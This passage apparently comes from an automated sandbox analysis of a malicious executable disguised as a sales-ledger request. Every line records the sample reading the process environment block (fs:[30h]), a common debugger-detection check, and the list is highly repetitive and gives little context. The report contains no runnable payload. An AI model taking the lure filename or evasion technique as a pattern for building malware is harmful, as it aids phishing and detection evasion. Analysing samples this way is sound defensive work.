                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122F0BF mov ecx, dword ptr fs:[00000030h]24_2_0122F0BF
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h]24_2_0122F0BF
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h]24_2_0122F0BF
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9080 mov eax, dword ptr fs:[00000030h]24_2_011F9080
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01273884 mov eax, dword ptr fs:[00000030h]24_2_01273884
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01273884 mov eax, dword ptr fs:[00000030h]24_2_01273884
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F58EC mov eax, dword ptr fs:[00000030h]24_2_011F58EC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]24_2_0128B8D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128B8D0 mov ecx, dword ptr fs:[00000030h]24_2_0128B8D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]24_2_0128B8D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]24_2_0128B8D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]24_2_0128B8D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]24_2_0128B8D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h]24_2_011F40E1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h]24_2_011F40E1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h]24_2_011F40E1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B131B mov eax, dword ptr fs:[00000030h]24_2_012B131B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FF358 mov eax, dword ptr fs:[00000030h]24_2_011FF358
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h]24_2_01223B7A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h]24_2_01223B7A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FDB40 mov eax, dword ptr fs:[00000030h]24_2_011FDB40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8B58 mov eax, dword ptr fs:[00000030h]24_2_012C8B58
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FDB60 mov ecx, dword ptr fs:[00000030h]24_2_011FDB60
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C5BA5 mov eax, dword ptr fs:[00000030h]24_2_012C5BA5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h]24_2_01224BAD
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h]24_2_01224BAD
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h]24_2_01224BAD
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B138A mov eax, dword ptr fs:[00000030h]24_2_012B138A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AD380 mov ecx, dword ptr fs:[00000030h]24_2_012AD380
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h]24_2_01201B8F
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h]24_2_01201B8F
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122B390 mov eax, dword ptr fs:[00000030h]24_2_0122B390
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222397 mov eax, dword ptr fs:[00000030h]24_2_01222397
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]24_2_012203E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121DBE9 mov eax, dword ptr fs:[00000030h]24_2_0121DBE9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012753CA mov eax, dword ptr fs:[00000030h]24_2_012753CA
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012753CA mov eax, dword ptr fs:[00000030h]24_2_012753CA
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]24_2_0121A229
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h]24_2_011FAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h]24_2_011FAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h]24_2_01234A2C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h]24_2_01234A2C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov ecx, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]24_2_011F5210
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01208A0A mov eax, dword ptr fs:[00000030h]24_2_01208A0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01213A1C mov eax, dword ptr fs:[00000030h]24_2_01213A1C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h]24_2_012BAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h]24_2_012BAA16
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h]24_2_012AB260
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h]24_2_012AB260
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8A62 mov eax, dword ptr fs:[00000030h]24_2_012C8A62
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0123927A mov eax, dword ptr fs:[00000030h]24_2_0123927A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]24_2_011F9240
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BEA55 mov eax, dword ptr fs:[00000030h]24_2_012BEA55
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01284257 mov eax, dword ptr fs:[00000030h]24_2_01284257
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h]24_2_0120AAB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h]24_2_0120AAB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122FAB0 mov eax, dword ptr fs:[00000030h]24_2_0122FAB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h]24_2_0122D294
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h]24_2_0122D294
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]24_2_011F52A5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222AE4 mov eax, dword ptr fs:[00000030h]24_2_01222AE4
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222ACB mov eax, dword ptr fs:[00000030h]24_2_01222ACB
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0127A537 mov eax, dword ptr fs:[00000030h]24_2_0127A537
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BE539 mov eax, dword ptr fs:[00000030h]24_2_012BE539
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]24_2_01203D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8D34 mov eax, dword ptr fs:[00000030h]24_2_012C8D34
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]24_2_01224D3B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]24_2_01224D3B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]24_2_01224D3B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FAD30 mov eax, dword ptr fs:[00000030h]24_2_011FAD30
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h]24_2_0121C577
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h]24_2_0121C577
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01233D43 mov eax, dword ptr fs:[00000030h]24_2_01233D43
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01273540 mov eax, dword ptr fs:[00000030h]24_2_01273540
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012A3D40 mov eax, dword ptr fs:[00000030h]24_2_012A3D40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01217D50 mov eax, dword ptr fs:[00000030h]24_2_01217D50
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h]24_2_012C05AC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h]24_2_012C05AC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012235A1 mov eax, dword ptr fs:[00000030h]24_2_012235A1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]24_2_011F2D8A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]24_2_01221DB5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]24_2_01221DB5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]24_2_01221DB5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]24_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h]24_2_0122FD9B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h]24_2_0122FD9B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h]24_2_0120D5E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h]24_2_0120D5E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]24_2_012BFDE2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012A8DF1 mov eax, dword ptr fs:[00000030h]24_2_012A8DF1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov ecx, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]24_2_01276DC9
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122BC2C mov eax, dword ptr fs:[00000030h]24_2_0122BC2C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]24_2_012C740D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]24_2_012C740D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]24_2_012C740D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]24_2_012B1C06
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]24_2_01276C0A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121746D mov eax, dword ptr fs:[00000030h]24_2_0121746D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A44B mov eax, dword ptr fs:[00000030h]24_2_0122A44B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h]24_2_0128C450
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h]24_2_0128C450
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120849B mov eax, dword ptr fs:[00000030h]24_2_0120849B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B14FB mov eax, dword ptr fs:[00000030h]24_2_012B14FB
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]24_2_01276CF0
